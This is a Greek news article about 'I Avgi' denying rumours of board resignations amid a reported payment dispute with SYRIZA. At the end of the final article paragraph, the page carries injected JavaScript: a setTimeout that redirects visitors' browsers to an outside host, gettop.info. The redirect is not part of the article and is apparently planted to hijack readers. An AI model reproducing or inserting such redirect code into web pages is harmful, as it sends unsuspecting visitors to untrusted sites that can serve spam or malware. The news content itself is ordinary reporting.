«Μύλος» στην Αυγή με παραιτήσεις μελών του ΔΣ- «Ανευθυνότητες» απαντά η εφημερίδα

0
6

 

Με ανάρτησή της στην ηλεκτρονική έκδοση της εφημερίδας, η «Αυγή» διαψεύδει τη φημολογία που είχε αναπτυχθεί τις τελευταίες ώρες και έκανε λόγο για παραιτήσεις μελών του διοικητικού συμβουλίου.

Ειδικότερα, η ανακοίνωση της «Αυγής» αναφέρει πως «την τελευταία ώρα κυκλοφορούν στα social media διάφορες ανευθυνότητες περί παραίτησης της διοίκησης της Αυγής σε ένδειξη διαμαρτυρίας για την στάση του ΣΥΡΙΖΑ απέναντι στην εφημερίδα και άλλα παρόμοια ηχηρά. Δεν ισχύουν».

aygi_diapsesi

Νωρίτερα, επικράτησε ένταση στο ΔΣ της εφημερίδας «Η Αυγή», καθώς σύμφωνα με πληροφορίες υπήρξε διαξιφισμός ανάμεσα στον διευθύνοντα σύμβουλο Δημήτρη Στούμπο και στον γενικό γραμματέα του κόμματος Παναγιώτη Ρήγα για το συνεχιζόμενο τους τελευταίους μήνες πρόβλημα πληρωμών της εφημερίδας.

Μετά από αυτό, σύμφωνα πάντα με τα δημοσιεύματα, ο Δημήτρης Στούμπος υπέβαλε την παραίτησή του με τον πρόεδρο Βασίλη Μουλόπουλο και τον διευθυντή Κώστα Νικολακάκο να λένε πως αν παραιτηθεί ο Στούμπος, θα παραιτηθούν και αυτοί. Σύμφωνα με πληροφορίες, αποστάσεις κράτησε η Ράνια Σβίγκου η οποία και διαχώρισε τη θέση της. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here